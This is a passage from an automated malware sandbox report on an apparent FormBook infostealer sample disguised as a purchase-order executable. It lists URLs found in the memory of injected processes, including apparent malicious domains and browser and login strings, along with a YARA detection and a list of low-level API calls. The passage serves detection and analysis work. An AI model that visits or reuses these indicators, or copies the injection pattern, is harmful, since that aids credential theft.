                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/minify-font-icons/fonts.min.css?ver=
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/style-elementor.css
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/style.css?ver=6.7.1
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/2017/11/payment-icons.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-12.css?ver=1733888755
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-3701.css?ver=1733888755
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-3715.css?ver=1733888756
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/woocommerce-placeholder-350x350.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/underscore.min.js?ver=1.13.7
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/wp-util.min.js?ver=6.7.1
                Source: cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-json/
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-login.php?action=logout&amp;redirect_to=http%3A%2F%2Fwww.inbulkses.shop
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/xmlrpc.php
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/xmlrpc.php?rsd
                Source: svchost.exe, 00000005.00000002.2811721108.0000019712AA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2811942456.0000019712B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: RAVCpl64.exe, 0000000C.00000002.6024252717.00000000006C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sob.rip
                Source: RAVCpl64.exe, 0000000C.00000002.6024252717.00000000006C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sob.rip/tp8k/
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007D3C000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005A8C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://yes.3.cloudflareip.com/3d/index.php?www.jyshe18.buzz
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.shopify.com/s/files/1/0522/1505/4491/files/4lbw.jpg?v=1712601664
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.shopify.com/s/files/1/0522/1505/4491/files/8ozsleeve.png?v=1711659498
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.shopify.com/s/files/1/0522/1505/4491/products/1RedTkKO3lsX1kHMcPLNDRDmkrX7htRTW.jpg?v=16
                Source: --cG1-69-.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: --cG1-69-.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Jost%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Jost%3A300%2C300italic%2C400%2C400italic%2C500%2C500italic%2
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/
                Source: qmgr.db.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A74000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                Source: qmgr.db.5.drString found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC:
                Source: svchost.exe, 00000005.00000002.2811721108.0000019712AA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2811942456.0000019712B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: cttune.exe, 0000000D.00000002.5164151299.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: cttune.exe, 0000000D.00000002.5164151299.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: cttune.exe, 0000000D.00000003.1638432062.0000000007C11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://rankmath.com/
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://schema.org
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007D3C000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005A8C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://site.ip138.com/www.jyshe18.buzz
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008384000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008060000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007BAA000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.00000000060D4000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005DB0000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.00000000058FA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.PO 1202495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.PO 1202495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0042CCC3 NtClose,4_2_0042CCC3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_013F2B90
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_013F2BC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2A80 NtClose,LdrInitializeThunk,4_2_013F2A80
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_013F2D10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,4_2_013F2EB0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F34E0 NtCreateMutant,LdrInitializeThunk,4_2_013F34E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F4260 NtSetContextThread,4_2_013F4260
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F4570 NtSuspendThread,4_2_013F4570
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F29F0 NtReadFile,4_2_013F29F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F29D0 NtWaitForSingleObject,4_2_013F29D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2B20 NtQueryInformationProcess,4_2_013F2B20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2B10 NtAllocateVirtualMemory,4_2_013F2B10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2B00 NtQueryValueKey,4_2_013F2B00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2B80 NtCreateKey,4_2_013F2B80
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2BE0 NtQueryVirtualMemory,4_2_013F2BE0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2A10 NtWriteFile,4_2_013F2A10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2AA0 NtQueryInformationFile,4_2_013F2AA0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2AC0 NtEnumerateValueKey,4_2_013F2AC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2D50 NtWriteVirtualMemory,4_2_013F2D50
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2DA0 NtReadVirtualMemory,4_2_013F2DA0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2DC0 NtAdjustPrivilegesToken,4_2_013F2DC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2C30 NtMapViewOfSection,4_2_013F2C30
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2C20 NtSetInformationFile,4_2_013F2C20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2C10 NtOpenProcess,4_2_013F2C10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2C50 NtUnmapViewOfSection,4_2_013F2C50
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2CF0 NtDelayExecution,4_2_013F2CF0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2CD0 NtEnumerateKey,4_2_013F2CD0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2F30 NtOpenDirectoryObject,4_2_013F2F30
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2F00 NtCreateFile,4_2_013F2F00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2FB0 NtSetValueKey,4_2_013F2FB0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2E00 NtQueueApcThread,4_2_013F2E00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2E50 NtCreateSection,4_2_013F2E50
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2E80 NtCreateProcessEx,4_2_013F2E80
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2ED0 NtResumeThread,4_2_013F2ED0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2EC0 NtQuerySection,4_2_013F2EC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F38D0 NtGetContextThread,4_2_013F38D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F3C30 NtOpenProcessToken,4_2_013F3C30
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F3C90 NtOpenThread,4_2_013F3C90
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02CF0 NtDelayExecution,LdrInitializeThunk,13_2_04A02CF0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02C30 NtMapViewOfSection,LdrInitializeThunk,13_2_04A02C30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02D10 NtQuerySystemInformation,LdrInitializeThunk,13_2_04A02D10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02E50 NtCreateSection,LdrInitializeThunk,13_2_04A02E50
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02F00 NtCreateFile,LdrInitializeThunk,13_2_04A02F00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A029F0 NtReadFile,LdrInitializeThunk,13_2_04A029F0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02A80 NtClose,LdrInitializeThunk,13_2_04A02A80
